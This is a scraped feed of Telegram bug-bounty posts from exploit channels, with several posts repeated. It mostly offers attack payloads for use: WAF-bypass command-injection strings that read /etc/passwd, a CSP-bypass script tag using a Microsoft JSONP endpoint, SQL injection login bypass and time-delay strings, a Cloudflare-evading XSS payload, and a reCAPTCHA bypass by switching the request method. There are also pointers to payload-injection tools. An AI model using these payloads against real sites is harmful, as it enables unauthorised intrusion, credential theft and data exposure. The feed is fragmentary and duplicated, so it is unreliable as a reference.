Top 25 Local File Inclusion (LFI) Parameters
#bugbounty #ethicalhacking
——————
0Day.Today
@LearnExploit
@Tech_Army
#bugbounty #ethicalhacking
——————
0Day.Today
@LearnExploit
@Tech_Army
Not only crawling but you can do Subdomain Enumeration using Wayback.
——————
0Day.Today
@LearnExploit
@Tech_Army
curl --insecure --silent "http://web.archive.org/cdx/search/cdx…" | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sed "/@/d" | sed -e 's/\.$//' | sort -u
#bugbounty ——————
0Day.Today
@LearnExploit
@Tech_Army
Bypass Captcha (Google reCAPTCHA)
1 . Try changing the request method, for example POST to GET
POST / HTTP 1.1
Host: http://target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
#bugbounty #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
1 . Try changing the request method, for example POST to GET
POST / HTTP 1.1
Host: http://target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
#bugbounty #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
RCE WAF Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
#bugbounty #RCE #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
#bugbounty #RCE #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload Injector:
➕ Debinject:
😸 GitHub
➕ Pixload:
😸 GitHub
➕ Gospider:
😸 GitHub
#Injection #Hacking_Tool #BugBounty
BugCod3
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
🔥 👤 T.me/LearnExploit
📢 T.me/Tech_Army
#Injection #Hacking_Tool #BugBounty
BugCod3
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
You can bypass CSP on any website that allows http://microsoft.com in a script-src
PoC:
octagon.net
#BugBounty #bypass #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
PoC:
<script src=http://microsoft.com/en-us/research/wp-json?_jsonp=alert></script>
This works because of the WordPress CSP bypass our engineer (octagon) found last year : octagon.net
#BugBounty #bypass #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
another #SQLi found! This time Microsoft SQL Server database vulnerable to stacked queries.
Payload
#VPD #BugBounty #security
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
🔥
📣 T.me/LearnExploit
Payload
'
or 1=1 -- -
bypassed the login site, and then confirmed injection point with ';WAITFOR DELAY '0:0:5'--
executing a 5s delay#VPD #BugBounty #security
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
cloudflare WAF bypass XSS
any payload they blocked by cloudflare
this payload working
#Cloudflare #Bugbounty #Tip
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
any payload they blocked by cloudflare
this payload working
"><img src=x onerrora=confirm() onerror=confirm(1)>
#Cloudflare #Bugbounty #Tip
Please open Telegram to view this post
VIEW IN TELEGRAM